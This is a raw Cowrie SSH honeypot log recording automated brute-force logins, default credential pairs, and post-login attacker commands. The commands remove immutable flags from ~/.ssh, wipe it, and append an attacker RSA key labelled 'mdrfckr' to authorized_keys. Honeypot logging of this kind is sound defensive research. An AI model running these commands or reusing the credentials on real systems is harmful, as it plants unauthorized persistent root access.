{"eventid":"cowrie.session.closed","duration":"2.2","message":"Connection lost after 2.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:52:34.025506Z","src_ip":"36.89.28.139","session":"a510947654f1"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:52:34.287983Z","src_ip":"27.112.78.170","session":"78ef851d4fb0"}
{"eventid":"cowrie.session.connect","src_ip":"24.108.102.132","src_port":59216,"dst_ip":"1.2.3.4","dst_port":22,"session":"f176f37b31e9","protocol":"ssh","message":"New connection: 24.108.102.132:59216 (1.2.3.4:22) [session: f176f37b31e9]","sensor":"my-vps","timestamp":"2025-08-26T00:53:33.040895Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:53:33.045770Z","src_ip":"24.108.102.132","session":"f176f37b31e9"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:53:33.208112Z","src_ip":"24.108.102.132","session":"f176f37b31e9"}
{"eventid":"cowrie.session.connect","src_ip":"45.159.112.103","src_port":34418,"dst_ip":"1.2.3.4","dst_port":22,"session":"c7dc5fb9ac9a","protocol":"ssh","message":"New connection: 45.159.112.103:34418 (1.2.3.4:22) [session: c7dc5fb9ac9a]","sensor":"my-vps","timestamp":"2025-08-26T00:53:33.756735Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:53:33.757628Z","src_ip":"45.159.112.103","session":"c7dc5fb9ac9a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:53:33.866811Z","src_ip":"45.159.112.103","session":"c7dc5fb9ac9a"}
{"eventid":"cowrie.login.failed","username":"selenium","password":"selenium","message":"login attempt [selenium/selenium] failed","sensor":"my-vps","timestamp":"2025-08-26T00:53:33.872835Z","src_ip":"24.108.102.132","session":"f176f37b31e9"}
{"eventid":"cowrie.login.failed","username":"rc","password":"123","message":"login attempt [rc/123] failed","sensor":"my-vps","timestamp":"2025-08-26T00:53:34.343457Z","src_ip":"45.159.112.103","session":"c7dc5fb9ac9a"}
{"eventid":"cowrie.session.closed","duration":"2.0","message":"Connection lost after 2.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:53:35.041147Z","src_ip":"24.108.102.132","session":"f176f37b31e9"}
{"eventid":"cowrie.session.closed","duration":"1.7","message":"Connection lost after 1.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:53:35.454271Z","src_ip":"45.159.112.103","session":"c7dc5fb9ac9a"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":36138,"dst_ip":"1.2.3.4","dst_port":22,"session":"f979c88ff17d","protocol":"ssh","message":"New connection: 36.89.28.139:36138 (1.2.3.4:22) [session: f979c88ff17d]","sensor":"my-vps","timestamp":"2025-08-26T00:53:50.247538Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:53:50.248678Z","src_ip":"36.89.28.139","session":"f979c88ff17d"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:53:50.439393Z","src_ip":"36.89.28.139","session":"f979c88ff17d"}
{"eventid":"cowrie.login.success","username":"root","password":"Password1","message":"login attempt [root/Password1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:53:52.340818Z","src_ip":"36.89.28.139","session":"f979c88ff17d"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:53:52.806471Z","src_ip":"36.89.28.139","session":"f979c88ff17d"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:53:52.807175Z","src_ip":"36.89.28.139","session":"f979c88ff17d"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:53:52.807873Z","src_ip":"36.89.28.139","session":"f979c88ff17d"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":51926,"dst_ip":"1.2.3.4","dst_port":22,"session":"d3d8a035cada","protocol":"ssh","message":"New connection: 27.112.78.170:51926 (1.2.3.4:22) [session: d3d8a035cada]","sensor":"my-vps","timestamp":"2025-08-26T00:53:52.861401Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:53:52.862221Z","src_ip":"27.112.78.170","session":"d3d8a035cada"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:53:53.130557Z","src_ip":"27.112.78.170","session":"d3d8a035cada"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.7","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:53:53.461786Z","src_ip":"36.89.28.139","session":"f979c88ff17d"}
{"eventid":"cowrie.login.success","username":"root","password":"9090","message":"login attempt [root/9090] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:53:54.243568Z","src_ip":"27.112.78.170","session":"d3d8a035cada"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:53:54.323151Z","src_ip":"36.89.28.139","session":"f979c88ff17d"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:53:54.323909Z","src_ip":"36.89.28.139","session":"f979c88ff17d"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:53:54.516422Z","src_ip":"36.89.28.139","session":"f979c88ff17d"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:53:54.517230Z","src_ip":"36.89.28.139","session":"f979c88ff17d"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":51254,"dst_ip":"1.2.3.4","dst_port":22,"session":"de129efd25e8","protocol":"ssh","message":"New connection: 36.89.28.139:51254 (1.2.3.4:22) [session: de129efd25e8]","sensor":"my-vps","timestamp":"2025-08-26T00:53:54.695026Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:53:54.695842Z","src_ip":"36.89.28.139","session":"de129efd25e8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:53:54.865978Z","src_ip":"27.112.78.170","session":"d3d8a035cada"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:53:54.866709Z","src_ip":"27.112.78.170","session":"d3d8a035cada"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T00:53:54.867448Z","src_ip":"27.112.78.170","session":"d3d8a035cada"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:53:55.138985Z","src_ip":"27.112.78.170","session":"d3d8a035cada"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:53:55.513832Z","src_ip":"36.89.28.139","session":"de129efd25e8"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T00:53:55.779487Z","src_ip":"27.112.78.170","session":"d3d8a035cada"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T00:53:55.780320Z","src_ip":"27.112.78.170","session":"d3d8a035cada"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T00:53:56.050294Z","src_ip":"27.112.78.170","session":"d3d8a035cada"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:53:56.051225Z","src_ip":"27.112.78.170","session":"d3d8a035cada"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":51930,"dst_ip":"1.2.3.4","dst_port":22,"session":"763d85ac4716","protocol":"ssh","message":"New connection: 27.112.78.170:51930 (1.2.3.4:22) [session: 763d85ac4716]","sensor":"my-vps","timestamp":"2025-08-26T00:53:56.307228Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:53:56.308160Z","src_ip":"27.112.78.170","session":"763d85ac4716"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:53:56.567790Z","src_ip":"27.112.78.170","session":"763d85ac4716"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:53:56.890707Z","src_ip":"36.89.28.139","session":"de129efd25e8"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T00:53:57.645053Z","src_ip":"27.112.78.170","session":"763d85ac4716"}
{"eventid":"cowrie.session.closed","duration":"3.4","message":"Connection lost after 3.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:53:58.089434Z","src_ip":"36.89.28.139","session":"de129efd25e8"}
{"eventid":"cowrie.session.connect","src_ip":"36.89.28.139","src_port":51260,"dst_ip":"1.2.3.4","dst_port":22,"session":"a06858e96560","protocol":"ssh","message":"New connection: 36.89.28.139:51260 (1.2.3.4:22) [session: a06858e96560]","sensor":"my-vps","timestamp":"2025-08-26T00:53:58.263073Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:53:58.263954Z","src_ip":"36.89.28.139","session":"a06858e96560"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T00:53:58.438835Z","src_ip":"36.89.28.139","session":"a06858e96560"}
{"eventid":"cowrie.session.closed","duration":"2.6","message":"Connection lost after 2.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:53:58.905047Z","src_ip":"27.112.78.170","session":"763d85ac4716"}
{"eventid":"cowrie.session.connect","src_ip":"27.112.78.170","src_port":57056,"dst_ip":"1.2.3.4","dst_port":22,"session":"7807e8e4e338","protocol":"ssh","message":"New connection: 27.112.78.170:57056 (1.2.3.4:22) [session: 7807e8e4e338]","sensor":"my-vps","timestamp":"2025-08-26T00:53:59.174011Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T00:53:59.174950Z","src_ip":"27.112.78.170","session":"7807e8e4e338"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T00:53:59.178047Z","src_ip":"36.89.28.139","session":"a06858e96560"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:53:59.354384Z","src_ip":"36.89.28.139","session":"a06858e96560"}
{"eventid":"cowrie.session.closed","duration":"9.1","message":"Connection lost after 9.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T00:53:59.370568Z","src_ip":"36.89.28.139","session":"f979c88ff17d"}
